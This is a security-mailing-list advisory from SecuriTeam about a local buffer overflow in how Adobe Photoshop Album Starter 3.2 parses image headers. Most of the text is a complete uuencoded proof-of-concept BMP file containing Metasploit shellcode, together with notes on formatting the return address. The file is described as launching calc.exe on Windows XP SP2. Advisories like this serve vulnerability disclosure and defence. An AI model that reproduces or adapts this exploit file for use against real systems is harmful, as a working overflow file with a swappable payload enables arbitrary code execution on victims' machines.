[NT] Adobe Album Starter Unchecked Local Buffer Overflow (Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Adobe Album Starter Unchecked Local Buffer Overflow (Exploit)
------------------------------------------------------------------------


SUMMARY

A vulnerability in Adobe's Album Starter, allows attackers to cause the
product to overflow an internal buffer, which in turn can be used to cause
it to execute arbitrary code. This vulnerability is related to the parsing
of header images, in that the applications do not verify that the image
header is valid before trying to render it. This leaves an opportunity to
cause an unchecked buffer overflow and allow for the execution of
malicious code.

DETAILS

Vulnerable Systems:
* Adobe Photoshop Album Starter version 3.2
* Adobe After Effects CS3
* Adobe Photoshop CS3

Immune Systems:
* Adobe Reader
* Adobe Flash Player

Exploit:
There is a caveats to the bug as the shellcode and return address need to
be 4 byte values. Thus a return address of 0x41424344 needs to be in the
following format:
"\x44\x44\x44\x44\x43\x43\x43\x43\x42\x42\x42\x42\x41\x41\x41\x41"

Exploit is for Album Starter 3.2 on Windows XP SP2 to pop calc.exe: Used
shellcode is taken from the Metasploit project.

begin 644 Adobe_AS_Exploit.bmp
M0DTV`````````#8````H````0`8``+`$```!``@`04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04'\:NM-Z/G___]@BVPD)(M%/(M\!7@![XM/
M&(M?(`'K28LTBP'N,<"9K(3`="#!R@T*`<+K]#M4)"AUY8M?)`'K9HL,2XM?
M'`'K`RR+B6PD'&'#,=MDBT,PBT`,BW`<K8M`"%YHCDX.[%#_UF939F@S,FAW
M<S)?5/_0:,OM_#M0_]9?B>5F@>T(`E5J`O_0:-D)]:U7_]934U-34T-30U/_
MT&9H!-)F4XGAE6BD&G#'5__6:A!15?_0:*2M+NE7_]935?_0:.5)ADE7_]90
M5%15_]"3:.=YQGE7_]95_]!F:F1F:&-MB>5J4%DIS(GG:D2)XC'`\ZK^0BW^
M0BR3C7HXJZNK:'+^LQ;_=43_UEM74E%146H!45%54?_0:*W9!<Y3_]9J__\W
M_]"+5_R#Q&3_UE+_T&CPB@1?4__6_]``04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D-#0T-#0T-#0T-#0T-#
M0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#Z^OKZP0$!`20D)"0
MD)"0D&9F9F9=75U=L+"PL&%A86&0D)"0D)"0D)"0D)"0D)"0,S,S,\G)R<F#
M@X.#Z>GIZ=W=W=W9V=G9[N[N[MG9V=ET='1T)"0D)/3T]/1;6UM;@8&!@7-S
M<W,3$Q,36EI:6N[N[NXG)R<GBHJ*BH.#@X/KZ^OK_/S\_.+BXN+T]/3TIJ:F
MI@8&!@9C8V-CBHJ*BEI:6EKN[N[NK*RLK,_/S\]F9F9F965E95M;6UN/CX^/
M(B(B(N_O[^_(R,C(`0$!`145%17V]O;VK*RLK-75U=5Z>GIZ[^_O[\S,S,S#
MP\/#T='1T=K:VMJLK*RLBXN+B[2TM+3?W]_?Y^?GYQ,3$Q/V]O;V:FIJ:N?G
MY^?^_O[^75U=72\O+R_M[>WMAX>'AUM;6ULL+"PLS,S,S'Y^?GYA86%ANKJZ
MN@,#`P..CHZ.+R\O+PL+"PNLK*RLU=75U7Y^?G[O[^_OS,S,S.SL[.S1T='1
MXN+BXFQL;&P!`0$!!04%!?+R\O(F)B8F86%A8='1T='R\O+RK*RLK(N+BXNQ
ML;&Q9V=G9WM[>WNNKJZN7EY>7BTM+2T6%A862DI*2CX^/CYE965E9V=G9[JZ
MNKK?W]_?+BXN+E]?7U^&AH:&T='1T:ZNKJXK*RLK`0$!`2HJ*BKR\O+RBHJ*
MB@$!`0$R,C(RYN;FYLS,S,R#@X.#T='1T6YN;FZ7EY>7BHJ*BEI:6EKN[N[N
MK*RLK.+BXN)F9F9FL;&QL186%A9\?'Q\.CHZ.KBXN+BNKJZN<G)R<MG9V=DN
M+BXN7%Q<7-K:VMHR,C(R'AX>'JVMK:V.CHZ.!04%!8:&AH:_O[^_='1T=-#0
MT-#@X.#@<'!P<'5U=76]O;V]C8V-C49&1D;FYN;F.3DY.<#`P,!"0D)"\O+R
1\C\_/S_N[N[N)R<G)XJ*BHH`
`
end


ADDITIONAL INFORMATION

The information has been provided by <mailto:c0ntexb@xxxxxxxxx> c0ntex
(Scott Laurie).
The original article can be found at:
<http://www.milw0rm.com/exploits/5479>
http://www.milw0rm.com/exploits/5479



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NT] Multiple Vendor NOS Microsystems getPlus Downloader Stack Buffer Overflow Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... download, install, and update other software through the browser. ... Adobe uses this control ... for web based installations of Adobe Reader. ...
    (Securiteam)
  • [NEWS] Adobe License Management Service Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability within the Adobe License Management Service has been ... Download the Adobe License Management Service update from ...
    (Securiteam)
  • [EXPL] Adobe Version Cue VCNative Symlink Attack (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Version Cue is a software version tracking system for Adobe products ... within a short period of time crontab will overwrite ...
    (Securiteam)
  • [NEWS] Mac OS X / Adobe Version Cue Local Root
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in Mac OS X when its bundled with Adobe Version Cue allows ... haven:~ fintler$ id ...
    (Securiteam)
  • [EXPL] Adobe Version Cue VCNative Privileges Escalation (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Version Cue is a software version tracking system for Adobe products ... Adobe Version Cue VCNative, the following exploit code can be used to test ...
    (Securiteam)